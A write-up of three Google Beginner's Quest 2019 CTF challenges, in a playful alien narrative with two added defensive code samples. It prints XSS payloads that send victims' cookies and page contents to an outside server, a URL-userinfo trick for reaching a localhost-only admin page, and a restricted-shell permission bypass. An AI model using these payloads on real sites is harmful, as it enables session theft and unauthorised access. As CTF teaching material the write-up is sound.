Google CTF (Capture The Flag) Beginner's Quest 2019.

Section 1: Cookie World Order (web)

Embarking on the Google Beginners CTF 2019, we find ourselves entangled in a captivating web challenge, "Cookie World Order (web)." The discovery of a mysterious VPN named cWo takes center stage, painting a vivid picture of clandestine operations reminiscent of Xenon's hard-shelled turtle ruling class.

1.1 The Enigma of cWo

As we stumble upon the cWo, a veil of mystery shrouds this clandestine organization. Trusting their security to an external contractor, particularly one with questionable habits, adds an unexpected layer to the intrigue. The parallels drawn with Xenon's turtle-like ruling class set the stage for a journey into the unknown, with the elusive "Cauliflowers" emerging as the dominant lifeforms within the cWo.

1.2 The Gateway: cWo-XSS Challenge

Our journey unfolds with a pivotal link: the cWo-XSS Challenge. The page reflects the value of the reflect parameter back into the response unescaped, a classic reflected XSS. The injected payload:

<SCRIPT SRC="https://mfurga.com/xss.js"></SCRIPT>

loads a script that uses XMLHttpRequest to read document.cookie and send it, base64-encoded, to an external server under our control. The access log on that server shows the admin bot's headless Chrome visiting the reflected payload and handing over its cookies:

104.155.55.51 - - [28/Jul/2019:16:03:51 +0200] "GET /?data=ZmxhZz1DVEZ7M21icjRjM190aGVfYzAwazFlX3cwcjFkX29yZDNyfTsgYXV0aD1UVXRiOVBQQTljWWtmY1ZRV1l6eHk0WGJ0eUwzVk5Leg== HTTP/1.0" 200 1959 "https://cwo-xss.web.ctfcompetition.com/exploit?reflect=%3CSCRIPT/XSS%20SRC=%22https://mfurga.com/xss.js%22%3E%3C/SCRIPT%3E" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3827.0 Safari/537.36"

The base64 in the data parameter decodes to:

flag=CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}; auth=TUtb9PPA9cYkfcVQWYzxy4XbtyL3VNKz

The first flag is in the flag cookie, and the auth cookie becomes our key to unraveling the mysteries held within /admin/controls.
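The exfiltration above worked because the flag and auth cookies were readable from JavaScript. The following audit script is an added example, not code from the original writeup or from the challenge: it parses Set-Cookie headers and reports the attributes whose absence makes a cookie exposed to exactly this kind of payload. The sample headers and the cookie value EXAMPLE_SESSION_TOKEN are constructed for the example.

```javascript
// Added example: audit Set-Cookie headers for attributes that limit what an
// injected script can do with a cookie. Not part of the original writeup.

// Parse one Set-Cookie header into its name and a lowercase attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attributes = {};
  for (const attr of attrs) {
    if (attr === "") continue;
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, attributes };
}

// Return the list of weaknesses for a single cookie.
function auditCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  const findings = [];
  if (!attributes.httponly) {
    // Without HttpOnly the value is visible to document.cookie, which is how
    // the payload in this section obtained "flag=" and "auth=".
    findings.push("missing HttpOnly: readable via document.cookie");
  }
  if (!attributes.secure) {
    findings.push("missing Secure: sent over plaintext HTTP");
  }
  const sameSite =
    typeof attributes.samesite === "string" ? attributes.samesite.toLowerCase() : "";
  if (sameSite !== "lax" && sameSite !== "strict") {
    findings.push("SameSite not Lax/Strict: sent on cross-site requests");
  }
  return { name, findings };
}

function auditAll(headers) {
  return headers.map(auditCookie);
}

// Constructed sample headers: the first is the weak form seen in this
// challenge, the second is the hardened form of the same cookie.
const SAMPLE_HEADERS = [
  "auth=EXAMPLE_SESSION_TOKEN; Path=/",
  "auth=EXAMPLE_SESSION_TOKEN; Path=/; HttpOnly; Secure; SameSite=Lax",
];

for (const result of auditAll(SAMPLE_HEADERS)) {
  console.log(result.name, result.findings.length === 0 ? "ok" : result.findings);
}
```

HttpOnly stops the document.cookie read used here, but not the pattern in Section 3 below, where the injected script simply makes authenticated requests from inside the victim's browser; that needs output encoding of user-supplied content and a Content-Security-Policy that blocks inline and third-party script.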

1.3 The Conundrum of /admin/controls

Our exploration leads us to /admin/controls, where the second flag awaits, but the endpoint only accepts requests that come from 127.0.0.1. Undeterred, we navigate through trials, eventually discovering a Local File Inclusion (LFI) pathway in the /watch endpoint, whose livestream parameter makes the server fetch a URL of our choosing.

1.4 Triumph Through LFI Exploits

Crafting a meticulous URL:

<https://cwo-xss.web.ctfcompetition.com/watch?livestream=https://cwo-xss.web.ctfcompetition.com@127.0.0.1/admin/controls>

Everything between the scheme and the @ is parsed as userinfo, not as the host, so a check that only looks at the start of the string sees the expected domain while the request actually goes to 127.0.0.1. Because the server itself makes that request, it arrives from 127.0.0.1 and passes the localhost check. The LFI exploit proves successful, granting access to the coveted /admin/controls page. Here, the second flag unfurls its secrets, solidifying our triumph over the challenges presented by the Cookie World Order.
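To make the host-confusion concrete, here is an added example (not code from the writeup or the challenge) contrasting a string-prefix check, which the userinfo trick above defeats, with a check that asks the URL parser which host the request would actually reach. It uses Node's built-in WHATWG URL class; the allow-listed host is the challenge's own domain, and the loopback list is illustrative rather than complete.

```javascript
// Added example: why a prefix check on a fetch URL is bypassable and what a
// parser-based host check reports instead. Not part of the original writeup.

const ALLOWED_HOST = "cwo-xss.web.ctfcompetition.com"; // host from the challenge
// Illustrative loopback names; a production check would also resolve DNS and
// reject private, link-local and metadata ranges.
const LOOPBACK = new Set(["127.0.0.1", "localhost", "[::1]", "0.0.0.0"]);

// Naive check: "does the URL start with our origin?" The userinfo form
// https://<allowed-host>@127.0.0.1/... passes this test.
function naiveAllows(url) {
  return url.startsWith("https://" + ALLOWED_HOST);
}

// Ask the URL parser where the request really goes.
function resolvedHost(url) {
  return new URL(url).hostname;
}

// Parser-based check: correct scheme, no userinfo at all, host exactly
// the allow-listed one and never a loopback address.
function strictAllows(url) {
  let u;
  try {
    u = new URL(url);
  } catch {
    return false; // unparseable input is rejected, not guessed at
  }
  if (u.protocol !== "https:") return false;
  if (u.username !== "" || u.password !== "") return false;
  if (LOOPBACK.has(u.hostname)) return false;
  return u.hostname === ALLOWED_HOST;
}

// Classify a list of candidate URLs under both checks.
function classify(urls) {
  return urls.map((url) => ({
    url,
    naive: naiveAllows(url),
    host: (() => { try { return resolvedHost(url); } catch { return null; } })(),
    strict: strictAllows(url),
  }));
}

// Constructed samples: the payload from this section plus ordinary cases.
const SAMPLE_URLS = [
  "https://cwo-xss.web.ctfcompetition.com@127.0.0.1/admin/controls",
  "https://cwo-xss.web.ctfcompetition.com/watch?livestream=x",
  "http://cwo-xss.web.ctfcompetition.com/",
  "not a url",
];

for (const r of classify(SAMPLE_URLS)) {
  console.log(`${r.url}\n  naive=${r.naive} host=${r.host} strict=${r.strict}`);
}
```

The point of strict checking is that the host comparison happens on the parsed authority, the same component the HTTP client will connect to, rather than on the raw string the attacker controls.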

Here are the two flags:

FLAG: CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}

FLAG: CTF{WhatIsThisCookieFriendSpaceBookPlusAllAccessRedPremiumThingLooksYummy}

Section 2: Work Computer (sandbox)

With the confidence and decision-making skills that once qualified you as a contender for Xenon's Universal takeover council (now disbanded), you forge ahead to the work computer. Surprisingly, the machine graciously introduces itself, detailing its hardware and peripherals. Your inquisitive mind fixates on the price announcement of the display stand—$999. The trivialities of Earth's currency exchange to Xenonivian Bucklets become a passing thought as you immerse yourself in more pressing matters.

A peculiar image captures your attention, labeled "Cauliflower for cWo." Your forty hearts skip a beat; these Cauliflowers appear familiar, resembling your neighbors back home with their curdley lobes. The thought of them attending the party brings a smile to your multi-faceted face.

SarahH, an apparent programmer with several clients, unwittingly leaves a terminal open. Apologies to the clients, but aliens are about to poke around in search of Cauliflowers. Navigating Earth's systems proves challenging, given the lack of familiar commands like cat, less, or more.

A connection to readme.ctfcompetition.com on port 1337 opens a gateway to a restricted shell. Listing the working directory shows the two flag files and their permissions:

> nc -v readme.ctfcompetition.com 1337
> ls -la
total 12
drwxrwxrwt 2 0 0 80 Jul 14 12:17 .
drwxr-xr-x 20 0 0 4096 Jun 13 14:28 ..
---------- 1 1338 1338 33 Jul 14 12:17 ORME.flag
-r-------- 1 1338 1338 28 Jul 14 12:17 README.flag

Attempting to read ORME.flag is met with "Permission denied," since the file has no permission bits set at all, and chmod is not among the available commands. An exploration of what is available exposes the upx command, an executable packer. Seizing this opportunity, you use upx to write a compressed copy of the busybox binary under the name chmod: busybox is a multi-call binary that chooses which applet to run from the name it was invoked by, so the copy behaves as chmod.

> upx -9 -o /tmp/chmod /bin/busybox
> /tmp/chmod 777 ORME.flag
> shuf ORME.flag
CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}

README.flag, by contrast, is already readable by its owner, so the same shuf trick prints it with no chmod required:

> shuf README.flag
CTF{4ll_D474_5h4ll_B3_Fr33}

The Earthly challenges are overcome, and Xenonivian celebrations commence with the acquisition of both flags:

FLAG 1: CTF{4ll_D474_5h4ll_B3_Fr33}

FLAG 2: CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}

Section 3: Government Agriculture Network (web)

Undeterred by the alien world's bureaucratic boundaries, you delve into the Government Agriculture Network (web), uncovering a curious blend of personal and professional life. On Earth, you recall warnings about the perils of loose zips sinking commercial ships, a concept you ponder as you navigate the intertwining of work and personal affairs.

Accessing the Agricultural network with SarahH's credentials, you realize she holds the esteemed rank of Vendor/Contractor, a position you assume is reserved for the most revered individuals. Expecting a flow of information akin to Xenovian acid streams, you embark on a mission fueled by a newfound purpose – saving the small, attractive entity from an impending bipedal ingestion. The portal picture stirs emotions, creating an instant bond despite the lack of familiarity.

A sudden shift in the image, depicting the presumed consumption of the creature, triggers a surge of determination. You must save them; you must understand this "Gubberment" entity to halt the atrocity. As you beat on the metaphorical window, access to the cauliflower's host becomes paramount for a rescue mission.

3.1 Unleashing XSS for Information

The status shown after submitting a post hints that someone on the other side views submissions in a browser, a potential XSS vulnerability. You inject the following script into the portal's message field:

<h1>Hello world!</h1>
<script>
  // Fetch /admin with the viewer's own session cookies attached.
  var req = new XMLHttpRequest();
  req.onload = function () {
    // Send the /admin response body and the viewer's cookies, base64-encoded,
    // to the external server (synchronous request, so it completes before
    // the page is torn down).
    var reqHook = new XMLHttpRequest();
    reqHook.open(
      "GET",
      "https://mfurga.com?data=" + btoa(req.responseText) +
        "&cookies=" + btoa(document.cookie),
      false
    );
    reqHook.send();
  };
  req.open("GET", "/admin");
  req.send();
</script>

When the reviewer's browser renders the post, the script fetches /admin inside that browser's authenticated session and forwards both the response and the cookies to the external server. The access log there confirms the callback from the headless Chrome bot:

104.155.55.51 - - [27/Jul/2019:14:21:06 +0200] "GET /?data=Q1RGezhhYWEyZjM0YjM5MmI0MTU2MDE4MDRjMmY1ZjBmMjRlfQ==&cookies=ZmxhZz1DVEZ7OGFhYTJmMzRiMzkyYjQxNTYwMTgwNGMyZjVmMGYyNGV9OyBzZXNzaW9uPUhXU3V3WDg3ODRDbWtRQzFWdjBCWEVUanlYTXROUXJW HTTP/1.0" 200 1959 "https://govagriculture.web.ctfcompetition.com/pwn?msg=%3Ch1%3EHello+world%21%3C%2Fh1%3E%0D%0A%3Cscript%3E%0D%0A++var+req+%3D+new+XMLHttpRequest%28%29%3B%0D%0A++req.onload+%3D+function%28%29+%7B%0D%0A++++var+reqHook+%3D+new+XMLHttpRequest%28%29%3B%0D%0A++++reqHook.open%28%0D%0A++++++%22GET%22%2C%0D%0A++++++%22https%3A%2F%2Fmfurga.com%3Fdata%3D%22+%2B+btoa%28req.responseText%29+%2B+%22%26cookies%3D%22+%2B+btoa%28document.cookie%29%2C%0D%0A++++++false%29%3B%0D%0A++++reqHook.send%28%29%3B%0D%0A++%7D%0D%0A++req.open%28%22GET%22%2C+%22%2Fadmin%22%29%3B%0D%0A++req.send%28%29%3B%0D%0A%3C%2Fscript%3E" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3827.0 Safari/537.36"

3.2 Unveiling the Gubberment Secrets

Decoding the base64 strings from the data and cookies parameters in the browser console reveals the valuable information:

> atob("Q1RGezhhYWEyZjM0YjM5MmI0MTU2MDE4MDRjMmY1ZjBmMjRlfQ==")
"CTF{8aaa2f34b392b415601804c2f5f0f24e}"
> atob("ZmxhZz1DVEZ7OGFhYTJmMzRiMzkyYjQxNTYwMTgwNGMyZjVmMGYyNGV9OyBzZXNzaW9uPUhXU3V3WDg3ODRDbWtRQzFWdjBCWEVUanlYTXROUXJW")
"flag=CTF{8aaa2f34b392b415601804c2f5f0f24e}; session=HWSuwX8784CmkQC1Vv0BXETjyXMtNQrV"

3.3 The Triumph of Rescue

The decoded data yields the flag (present both in the /admin response and in the flag cookie) and the admin's session id, marking the triumph of your mission:

FLAG: CTF{8aaa2f34b392b415601804c2f5f0f24e}